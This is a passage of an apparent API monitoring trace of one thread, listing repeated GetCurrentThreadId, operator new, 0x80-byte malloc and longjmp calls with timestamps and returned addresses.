	[0056.437] GetCurrentThreadId () returned 0x9a8
	[0056.437] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.437] malloc (_Size=0x80) returned 0x3c8940
	[0056.441] longjmp () 
	[0056.441] longjmp () 
	[0056.442] longjmp () 
	[0056.442] longjmp () 
	[0056.442] GetCurrentThreadId () returned 0x9a8
	[0056.442] GetCurrentThreadId () returned 0x9a8
	[0056.442] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.442] malloc (_Size=0x80) returned 0x3c83a0
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.443] malloc (_Size=0x80) returned 0x3c8700
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.443] malloc (_Size=0x80) returned 0x3c8e50
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] GetCurrentThreadId () returned 0x9a8
	[0056.443] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.443] malloc (_Size=0x80) returned 0x3c8a60
	[0056.449] GetCurrentThreadId () returned 0x9a8
	[0056.449] GetCurrentThreadId () returned 0x9a8
	[0056.449] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.449] malloc (_Size=0x80) returned 0x3c8940
	[0056.449] GetCurrentThreadId () returned 0x9a8
	[0056.449] GetCurrentThreadId () returned 0x9a8
	[0056.449] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.450] malloc (_Size=0x80) returned 0x3c8550
	[0056.451] GetCurrentThreadId () returned 0x9a8
	[0056.451] GetCurrentThreadId () returned 0x9a8
	[0056.451] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.451] malloc (_Size=0x80) returned 0x3c8e50
	[0056.452] GetCurrentThreadId () returned 0x9a8
	[0056.452] GetCurrentThreadId () returned 0x9a8
	[0056.452] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.452] malloc (_Size=0x80) returned 0x3c8670
	[0056.452] GetCurrentThreadId () returned 0x9a8
	[0056.453] GetCurrentThreadId () returned 0x9a8
	[0056.453] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.453] malloc (_Size=0x80) returned 0x3c8a60
	[0056.460] GetCurrentThreadId () returned 0x9a8
	[0056.460] GetCurrentThreadId () returned 0x9a8
	[0056.460] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.460] malloc (_Size=0x80) returned 0x3c8550
	[0056.463] GetCurrentThreadId () returned 0x9a8
	[0056.463] GetCurrentThreadId () returned 0x9a8
	[0056.463] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.463] malloc (_Size=0x80) returned 0x3c8310
	[0056.466] GetCurrentThreadId () returned 0x9a8
	[0056.466] GetCurrentThreadId () returned 0x9a8
	[0056.466] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.466] malloc (_Size=0x80) returned 0x3c8e50
	[0056.469] GetCurrentThreadId () returned 0x9a8
	[0056.470] GetCurrentThreadId () returned 0x9a8
	[0056.470] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.470] malloc (_Size=0x80) returned 0x3c8a60
	[0056.470] GetCurrentThreadId () returned 0x9a8
	[0056.470] GetCurrentThreadId () returned 0x9a8
	[0056.470] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.470] malloc (_Size=0x80) returned 0x3c8670
	[0056.471] GetCurrentThreadId () returned 0x9a8
	[0056.471] GetCurrentThreadId () returned 0x9a8
	[0056.471] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.471] malloc (_Size=0x80) returned 0x3c8940
	[0056.472] GetCurrentThreadId () returned 0x9a8
	[0056.472] GetCurrentThreadId () returned 0x9a8
	[0056.472] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.472] malloc (_Size=0x80) returned 0x3c8310
	[0056.474] GetCurrentThreadId () returned 0x9a8
	[0056.474] GetCurrentThreadId () returned 0x9a8
	[0056.474] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.474] malloc (_Size=0x80) returned 0x3c8a60
	[0056.475] GetCurrentThreadId () returned 0x9a8
	[0056.475] GetCurrentThreadId () returned 0x9a8
	[0056.475] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.475] malloc (_Size=0x80) returned 0x3c8940
	[0056.476] GetCurrentThreadId () returned 0x9a8
	[0056.476] GetCurrentThreadId () returned 0x9a8
	[0056.476] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.476] malloc (_Size=0x80) returned 0x3c8670
	[0056.477] GetCurrentThreadId () returned 0x9a8
	[0056.477] GetCurrentThreadId () returned 0x9a8
	[0056.477] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.477] malloc (_Size=0x80) returned 0x3c8310
	[0056.477] GetCurrentThreadId () returned 0x9a8
	[0056.477] GetCurrentThreadId () returned 0x9a8
	[0056.478] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.478] malloc (_Size=0x80) returned 0x3c8550
	[0056.503] GetCurrentThreadId () returned 0x9a8
	[0056.503] GetCurrentThreadId () returned 0x9a8
	[0056.503] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.503] malloc (_Size=0x80) returned 0x3c8e50
	[0056.504] GetCurrentThreadId () returned 0x9a8
	[0056.504] GetCurrentThreadId () returned 0x9a8
	[0056.504] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.504] malloc (_Size=0x80) returned 0x3c8940
	[0056.506] GetCurrentThreadId () returned 0x9a8
	[0056.506] GetCurrentThreadId () returned 0x9a8
	[0056.506] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.506] malloc (_Size=0x80) returned 0x3c8670
	[0056.507] GetCurrentThreadId () returned 0x9a8
	[0056.507] GetCurrentThreadId () returned 0x9a8
	[0056.507] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.507] malloc (_Size=0x80) returned 0x3c8550
	[0056.507] GetCurrentThreadId () returned 0x9a8
	[0056.507] GetCurrentThreadId () returned 0x9a8
	[0056.507] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.507] malloc (_Size=0x80) returned 0x3c8c10
	[0056.507] GetCurrentThreadId () returned 0x9a8
	[0056.508] GetCurrentThreadId () returned 0x9a8
	[0056.508] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.508] malloc (_Size=0x80) returned 0x3c8d30
	[0056.508] GetCurrentThreadId () returned 0x9a8
	[0056.508] GetCurrentThreadId () returned 0x9a8
	[0056.508] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.508] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.510] GetCurrentThreadId () returned 0x9a8
	[0056.510] GetCurrentThreadId () returned 0x9a8
	[0056.510] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0056.510] malloc (_Size=0x80) returned 0x3c84c0
	[0056.510] GetCurrentThreadId () returned 0x9a8
	[0056.510] GetCurrentThreadId () returned 0x9a8
	[0056.510] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.510] malloc (_Size=0x80) returned 0x3c8820
	[0056.511] GetCurrentThreadId () returned 0x9a8
	[0056.511] GetCurrentThreadId () returned 0x9a8
	[0056.511] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.511] malloc (_Size=0x80) returned 0x3c8af0
	[0056.523] GetCurrentThreadId () returned 0x9a8
	[0056.523] GetCurrentThreadId () returned 0x9a8
	[0056.523] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.523] malloc (_Size=0x80) returned 0x3c8550
	[0056.537] GetCurrentThreadId () returned 0x9a8
	[0056.537] GetCurrentThreadId () returned 0x9a8
	[0056.537] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.537] malloc (_Size=0x80) returned 0x3c8940
	[0056.540] GetCurrentThreadId () returned 0x9a8
	[0056.540] GetCurrentThreadId () returned 0x9a8
	[0056.540] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.540] malloc (_Size=0x80) returned 0x3c8310
	[0056.542] GetCurrentThreadId () returned 0x9a8
	[0056.542] GetCurrentThreadId () returned 0x9a8
	[0056.542] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.542] malloc (_Size=0x80) returned 0x3c8e50
	[0056.556] GetCurrentThreadId () returned 0x9a8
	[0056.556] GetCurrentThreadId () returned 0x9a8
	[0056.556] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.556] malloc (_Size=0x80) returned 0x3c8310
	[0056.558] GetCurrentThreadId () returned 0x9a8
	[0056.558] GetCurrentThreadId () returned 0x9a8
	[0056.558] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.558] malloc (_Size=0x80) returned 0x3c8e50
	[0056.558] GetCurrentThreadId () returned 0x9a8
	[0056.558] GetCurrentThreadId () returned 0x9a8
	[0056.558] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.558] malloc (_Size=0x80) returned 0x3c8a60
	[0056.559] GetCurrentThreadId () returned 0x9a8
	[0056.559] GetCurrentThreadId () returned 0x9a8
	[0056.559] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.559] malloc (_Size=0x80) returned 0x3c8d30
	[0056.592] GetCurrentThreadId () returned 0x9a8
	[0056.592] GetCurrentThreadId () returned 0x9a8
	[0056.592] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.592] malloc (_Size=0x80) returned 0x3c8700
	[0056.615] GetCurrentThreadId () returned 0x9a8
	[0056.615] GetCurrentThreadId () returned 0x9a8
	[0056.615] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.615] malloc (_Size=0x80) returned 0x3c8670
	[0056.619] GetCurrentThreadId () returned 0x9a8
	[0056.619] GetCurrentThreadId () returned 0x9a8
	[0056.619] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.619] malloc (_Size=0x80) returned 0x3c8670
	[0056.620] GetCurrentThreadId () returned 0x9a8
	[0056.620] GetCurrentThreadId () returned 0x9a8
	[0056.620] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.620] malloc (_Size=0x80) returned 0x3c8e50
	[0056.625] GetCurrentThreadId () returned 0x9a8
	[0056.625] GetCurrentThreadId () returned 0x9a8
	[0056.626] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.626] malloc (_Size=0x80) returned 0x3c8310
	[0056.626] GetCurrentThreadId () returned 0x9a8
	[0056.626] GetCurrentThreadId () returned 0x9a8
	[0056.626] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.626] malloc (_Size=0x80) returned 0x3c8700
	[0056.627] GetCurrentThreadId () returned 0x9a8
	[0056.627] GetCurrentThreadId () returned 0x9a8
	[0056.627] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.627] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.630] GetCurrentThreadId () returned 0x9a8
	[0056.631] GetCurrentThreadId () returned 0x9a8
	[0056.631] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.631] malloc (_Size=0x80) returned 0x3c8310
	[0056.633] GetCurrentThreadId () returned 0x9a8
	[0056.633] GetCurrentThreadId () returned 0x9a8
	[0056.633] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.633] malloc (_Size=0x80) returned 0x3c8550
	[0056.634] GetCurrentThreadId () returned 0x9a8
	[0056.634] GetCurrentThreadId () returned 0x9a8
	[0056.634] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.634] malloc (_Size=0x80) returned 0x3c8d30
	[0056.637] GetCurrentThreadId () returned 0x9a8
	[0056.637] GetCurrentThreadId () returned 0x9a8
	[0056.637] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.637] malloc (_Size=0x80) returned 0x3c8e50
	[0056.639] GetCurrentThreadId () returned 0x9a8
	[0056.639] GetCurrentThreadId () returned 0x9a8
	[0056.639] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.639] malloc (_Size=0x80) returned 0x3c8550
	[0056.651] GetCurrentThreadId () returned 0x9a8
	[0056.651] GetCurrentThreadId () returned 0x9a8
	[0056.651] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.651] malloc (_Size=0x80) returned 0x3c8310
	[0056.654] GetCurrentThreadId () returned 0x9a8
	[0056.654] GetCurrentThreadId () returned 0x9a8
	[0056.654] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.654] malloc (_Size=0x80) returned 0x3c83a0
	[0056.655] GetCurrentThreadId () returned 0x9a8
	[0056.655] GetCurrentThreadId () returned 0x9a8
	[0056.655] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.655] malloc (_Size=0x80) returned 0x3c8670
	[0056.655] GetCurrentThreadId () returned 0x9a8
	[0056.655] GetCurrentThreadId () returned 0x9a8
	[0056.655] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.655] malloc (_Size=0x80) returned 0x3c8700
	[0056.656] GetCurrentThreadId () returned 0x9a8
	[0056.656] GetCurrentThreadId () returned 0x9a8
	[0056.656] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.656] malloc (_Size=0x80) returned 0x3c8d30
	[0056.657] GetCurrentThreadId () returned 0x9a8
	[0056.657] GetCurrentThreadId () returned 0x9a8
	[0056.657] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.657] malloc (_Size=0x80) returned 0x3c8550
	[0056.658] GetCurrentThreadId () returned 0x9a8
	[0056.658] GetCurrentThreadId () returned 0x9a8
	[0056.658] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.658] malloc (_Size=0x80) returned 0x3c8940
	[0056.658] GetCurrentThreadId () returned 0x9a8
	[0056.658] GetCurrentThreadId () returned 0x9a8
	[0056.658] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.658] malloc (_Size=0x80) returned 0x3c8e50
	[0056.659] GetCurrentThreadId () returned 0x9a8
	[0056.659] GetCurrentThreadId () returned 0x9a8
	[0056.659] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.659] malloc (_Size=0x80) returned 0x3c8310
	[0056.660] GetCurrentThreadId () returned 0x9a8
	[0056.660] GetCurrentThreadId () returned 0x9a8
	[0056.660] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.660] malloc (_Size=0x80) returned 0x3c8700
	[0056.662] GetCurrentThreadId () returned 0x9a8
	[0056.662] GetCurrentThreadId () returned 0x9a8
	[0056.662] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.662] malloc (_Size=0x80) returned 0x3c8670
	[0056.663] GetCurrentThreadId () returned 0x9a8
	[0056.663] GetCurrentThreadId () returned 0x9a8
	[0056.663] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.663] malloc (_Size=0x80) returned 0x3c8940
	[0056.665] GetCurrentThreadId () returned 0x9a8
	[0056.665] GetCurrentThreadId () returned 0x9a8
	[0056.665] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.665] malloc (_Size=0x80) returned 0x3c8310
	[0056.666] GetCurrentThreadId () returned 0x9a8
	[0056.666] GetCurrentThreadId () returned 0x9a8
	[0056.666] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.666] malloc (_Size=0x80) returned 0x3c8700
	[0056.667] GetCurrentThreadId () returned 0x9a8
	[0056.667] GetCurrentThreadId () returned 0x9a8
	[0056.667] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.667] malloc (_Size=0x80) returned 0x3c8670
	[0056.668] GetCurrentThreadId () returned 0x9a8
	[0056.668] GetCurrentThreadId () returned 0x9a8
	[0056.668] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.668] malloc (_Size=0x80) returned 0x3c8940
	[0056.669] GetCurrentThreadId () returned 0x9a8
	[0056.669] GetCurrentThreadId () returned 0x9a8
	[0056.669] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.669] malloc (_Size=0x80) returned 0x3c8550
	[0056.670] GetCurrentThreadId () returned 0x9a8
	[0056.670] GetCurrentThreadId () returned 0x9a8
	[0056.670] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.670] malloc (_Size=0x80) returned 0x3c8700
	[0056.673] GetCurrentThreadId () returned 0x9a8
	[0056.673] GetCurrentThreadId () returned 0x9a8
	[0056.673] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.673] malloc (_Size=0x80) returned 0x3c8310
	[0056.673] GetCurrentThreadId () returned 0x9a8
	[0056.673] GetCurrentThreadId () returned 0x9a8
	[0056.673] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.673] malloc (_Size=0x80) returned 0x3c8940
	[0056.675] GetCurrentThreadId () returned 0x9a8
	[0056.675] GetCurrentThreadId () returned 0x9a8
	[0056.675] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.675] malloc (_Size=0x80) returned 0x3c8670
	[0056.675] GetCurrentThreadId () returned 0x9a8
	[0056.682] GetCurrentThreadId () returned 0x9a8
	[0056.682] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.682] malloc (_Size=0x80) returned 0x3c8700
	[0056.683] GetCurrentThreadId () returned 0x9a8
	[0056.683] GetCurrentThreadId () returned 0x9a8
	[0056.683] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.683] malloc (_Size=0x80) returned 0x3c8550
	[0056.684] GetCurrentThreadId () returned 0x9a8
	[0056.684] GetCurrentThreadId () returned 0x9a8
	[0056.684] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.684] malloc (_Size=0x80) returned 0x3c8940
	[0056.685] GetCurrentThreadId () returned 0x9a8
	[0056.685] GetCurrentThreadId () returned 0x9a8
	[0056.685] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.685] malloc (_Size=0x80) returned 0x3c8310
	[0056.686] GetCurrentThreadId () returned 0x9a8
	[0056.686] GetCurrentThreadId () returned 0x9a8
	[0056.686] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.686] malloc (_Size=0x80) returned 0x3c8700
	[0056.688] GetCurrentThreadId () returned 0x9a8
	[0056.688] GetCurrentThreadId () returned 0x9a8
	[0056.688] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.688] malloc (_Size=0x80) returned 0x3c8670
	[0056.688] GetCurrentThreadId () returned 0x9a8
	[0056.688] GetCurrentThreadId () returned 0x9a8
	[0056.688] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.688] malloc (_Size=0x80) returned 0x3c8940
	[0056.690] GetCurrentThreadId () returned 0x9a8
	[0056.690] GetCurrentThreadId () returned 0x9a8
	[0056.690] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.690] malloc (_Size=0x80) returned 0x3c8310
	[0056.690] GetCurrentThreadId () returned 0x9a8
	[0056.690] GetCurrentThreadId () returned 0x9a8
	[0056.690] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.690] malloc (_Size=0x80) returned 0x3c8700
	[0056.694] GetCurrentThreadId () returned 0x9a8
	[0056.694] GetCurrentThreadId () returned 0x9a8
	[0056.694] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.694] malloc (_Size=0x80) returned 0x3c8550
	[0056.694] GetCurrentThreadId () returned 0x9a8
	[0056.695] GetCurrentThreadId () returned 0x9a8
	[0056.695] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.695] malloc (_Size=0x80) returned 0x3c8940
	[0056.696] longjmp () 
	[0056.696] GetCurrentThreadId () returned 0x9a8
	[0056.696] GetCurrentThreadId () returned 0x9a8
	[0056.696] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.696] malloc (_Size=0x80) returned 0x3c8670
	[0056.697] GetCurrentThreadId () returned 0x9a8
	[0056.697] GetCurrentThreadId () returned 0x9a8
	[0056.697] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.697] malloc (_Size=0x80) returned 0x3c8310
	[0056.698] longjmp () 
	[0056.700] GetCurrentThreadId () returned 0x9a8
	[0056.700] GetCurrentThreadId () returned 0x9a8
	[0056.700] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0056.700] malloc (_Size=0x80) returned 0x3c8670
	[0056.700] GetCurrentThreadId () returned 0x9a8
	[0056.701] GetCurrentThreadId () returned 0x9a8
	[0056.701] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.701] malloc (_Size=0x80) returned 0x3c83a0
	[0056.704] GetCurrentThreadId () returned 0x9a8
	[0056.704] GetCurrentThreadId () returned 0x9a8
	[0056.704] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.704] malloc (_Size=0x80) returned 0x3c8550
	[0056.704] longjmp () 
	[0056.705] longjmp () 
	[0056.709] GetCurrentThreadId () returned 0x9a8
	[0056.709] GetCurrentThreadId () returned 0x9a8
	[0056.709] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.709] malloc (_Size=0x80) returned 0x3c8700
	[0056.716] GetCurrentThreadId () returned 0x9a8
	[0056.716] GetCurrentThreadId () returned 0x9a8
	[0056.716] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.716] malloc (_Size=0x80) returned 0x3c8c10
	[0056.723] GetCurrentThreadId () returned 0x9a8
	[0056.723] GetCurrentThreadId () returned 0x9a8
	[0056.723] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.723] malloc (_Size=0x80) returned 0x3c8d30
	[0056.729] GetCurrentThreadId () returned 0x9a8
	[0056.729] GetCurrentThreadId () returned 0x9a8
	[0056.729] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.729] malloc (_Size=0x80) returned 0x3c8d30
	[0056.739] GetCurrentThreadId () returned 0x9a8
	[0056.739] GetCurrentThreadId () returned 0x9a8
	[0056.739] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.739] malloc (_Size=0x80) returned 0x3c8a60
	[0056.739] GetCurrentThreadId () returned 0x9a8
	[0056.739] GetCurrentThreadId () returned 0x9a8
	[0056.739] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.740] malloc (_Size=0x80) returned 0x3c8e50
	[0056.740] GetCurrentThreadId () returned 0x9a8
	[0056.740] GetCurrentThreadId () returned 0x9a8
	[0056.740] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.740] malloc (_Size=0x80) returned 0x3c84c0
	[0056.752] GetCurrentThreadId () returned 0x9a8
	[0056.752] GetCurrentThreadId () returned 0x9a8
	[0056.752] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.752] malloc (_Size=0x80) returned 0x3c8d30
	[0056.755] GetCurrentThreadId () returned 0x9a8
	[0056.755] GetCurrentThreadId () returned 0x9a8
	[0056.755] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.755] malloc (_Size=0x80) returned 0x3c8940
	[0056.762] GetCurrentThreadId () returned 0x9a8
	[0056.762] GetCurrentThreadId () returned 0x9a8
	[0056.762] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.762] malloc (_Size=0x80) returned 0x3c8e50
	[0056.767] GetCurrentThreadId () returned 0x9a8
	[0056.767] GetCurrentThreadId () returned 0x9a8
	[0056.767] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.767] malloc (_Size=0x80) returned 0x3c84c0
	[0056.771] GetCurrentThreadId () returned 0x9a8
	[0056.771] GetCurrentThreadId () returned 0x9a8
	[0056.771] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.771] malloc (_Size=0x80) returned 0x3c8940
	[0056.774] GetCurrentThreadId () returned 0x9a8
	[0056.775] GetCurrentThreadId () returned 0x9a8
	[0056.775] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.775] malloc (_Size=0x80) returned 0x3c8e50
	[0056.779] GetCurrentThreadId () returned 0x9a8
	[0056.779] GetCurrentThreadId () returned 0x9a8
	[0056.779] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.780] malloc (_Size=0x80) returned 0x3c8e50
	[0056.780] GetCurrentThreadId () returned 0x9a8
	[0056.780] GetCurrentThreadId () returned 0x9a8
	[0056.780] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.780] malloc (_Size=0x80) returned 0x3c8c10
	[0056.797] GetCurrentThreadId () returned 0x9a8
	[0056.797] GetCurrentThreadId () returned 0x9a8
	[0056.797] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.797] malloc (_Size=0x80) returned 0x3c8c10
	[0056.798] GetCurrentThreadId () returned 0x9a8
	[0056.798] GetCurrentThreadId () returned 0x9a8
	[0056.798] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.799] malloc (_Size=0x80) returned 0x3c8940
	[0056.800] longjmp () 
	[0056.800] GetCurrentThreadId () returned 0x9a8
	[0056.800] GetCurrentThreadId () returned 0x9a8
	[0056.801] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.801] malloc (_Size=0x80) returned 0x3c8310
	[0056.801] GetCurrentThreadId () returned 0x9a8
	[0056.801] GetCurrentThreadId () returned 0x9a8
	[0056.801] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.801] malloc (_Size=0x80) returned 0x3c8940
	[0056.801] GetCurrentThreadId () returned 0x9a8
	[0056.801] GetCurrentThreadId () returned 0x9a8
	[0056.801] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.801] malloc (_Size=0x80) returned 0x3c8d30
	[0056.803] GetCurrentThreadId () returned 0x9a8
	[0056.803] GetCurrentThreadId () returned 0x9a8
	[0056.803] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0056.803] malloc (_Size=0x80) returned 0x3c85e0
	[0056.803] GetCurrentThreadId () returned 0x9a8
	[0056.803] GetCurrentThreadId () returned 0x9a8
	[0056.803] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.803] malloc (_Size=0x80) returned 0x3c8700
	[0056.808] GetCurrentThreadId () returned 0x9a8
	[0056.808] GetCurrentThreadId () returned 0x9a8
	[0056.808] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0056.808] malloc (_Size=0x80) returned 0x3c8940
	[0056.808] GetCurrentThreadId () returned 0x9a8
	[0056.808] GetCurrentThreadId () returned 0x9a8
	[0056.808] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.808] malloc (_Size=0x80) returned 0x3c8d30
	[0056.809] GetCurrentThreadId () returned 0x9a8
	[0056.809] GetCurrentThreadId () returned 0x9a8
	[0056.809] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.809] malloc (_Size=0x80) returned 0x3c8a60
	[0056.812] GetCurrentThreadId () returned 0x9a8
	[0056.812] GetCurrentThreadId () returned 0x9a8
	[0056.812] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.812] malloc (_Size=0x80) returned 0x3c84c0
	[0056.812] GetCurrentThreadId () returned 0x9a8
	[0056.812] GetCurrentThreadId () returned 0x9a8
	[0056.813] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.813] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.821] GetCurrentThreadId () returned 0x9a8
	[0056.821] GetCurrentThreadId () returned 0x9a8
	[0056.821] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.821] malloc (_Size=0x80) returned 0x3c8550
	[0056.826] GetCurrentThreadId () returned 0x9a8
	[0056.826] GetCurrentThreadId () returned 0x9a8
	[0056.826] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.826] malloc (_Size=0x80) returned 0x3c84c0
	[0056.827] GetCurrentThreadId () returned 0x9a8
	[0056.827] GetCurrentThreadId () returned 0x9a8
	[0056.827] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.827] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.832] GetCurrentThreadId () returned 0x9a8
	[0056.832] GetCurrentThreadId () returned 0x9a8
	[0056.832] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0056.832] malloc (_Size=0x80) returned 0x3c8d30
	[0056.833] GetCurrentThreadId () returned 0x9a8
	[0056.833] GetCurrentThreadId () returned 0x9a8
	[0056.833] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.834] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.834] GetCurrentThreadId () returned 0x9a8
	[0056.834] GetCurrentThreadId () returned 0x9a8
	[0056.834] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.834] malloc (_Size=0x80) returned 0x3c8e50
	[0056.841] GetCurrentThreadId () returned 0x9a8
	[0056.841] GetCurrentThreadId () returned 0x9a8
	[0056.841] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.841] malloc (_Size=0x80) returned 0x3c8550
	[0056.842] GetCurrentThreadId () returned 0x9a8
	[0056.842] GetCurrentThreadId () returned 0x9a8
	[0056.842] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.842] malloc (_Size=0x80) returned 0x3c8e50
	[0056.857] GetCurrentThreadId () returned 0x9a8
	[0056.858] GetCurrentThreadId () returned 0x9a8
	[0056.858] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0056.858] malloc (_Size=0x80) returned 0x3c8dc0
	[0056.861] GetCurrentThreadId () returned 0x9a8
	[0056.861] GetCurrentThreadId () returned 0x9a8
	[0056.861] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0056.861] malloc (_Size=0x80) returned 0x3c8820
	[0056.864] GetCurrentThreadId () returned 0x9a8
	[0056.864] GetCurrentThreadId () returned 0x9a8
	[0056.864] ??2@YAPEAX_K@Z () returned 0x3e4a00
	[0056.864] malloc (_Size=0x80) returned 0x3c8790
	[0056.880] longjmp () 
	[0056.881] longjmp () 
	[0056.884] GetCurrentThreadId () returned 0x9a8
	[0056.884] GetCurrentThreadId () returned 0x9a8
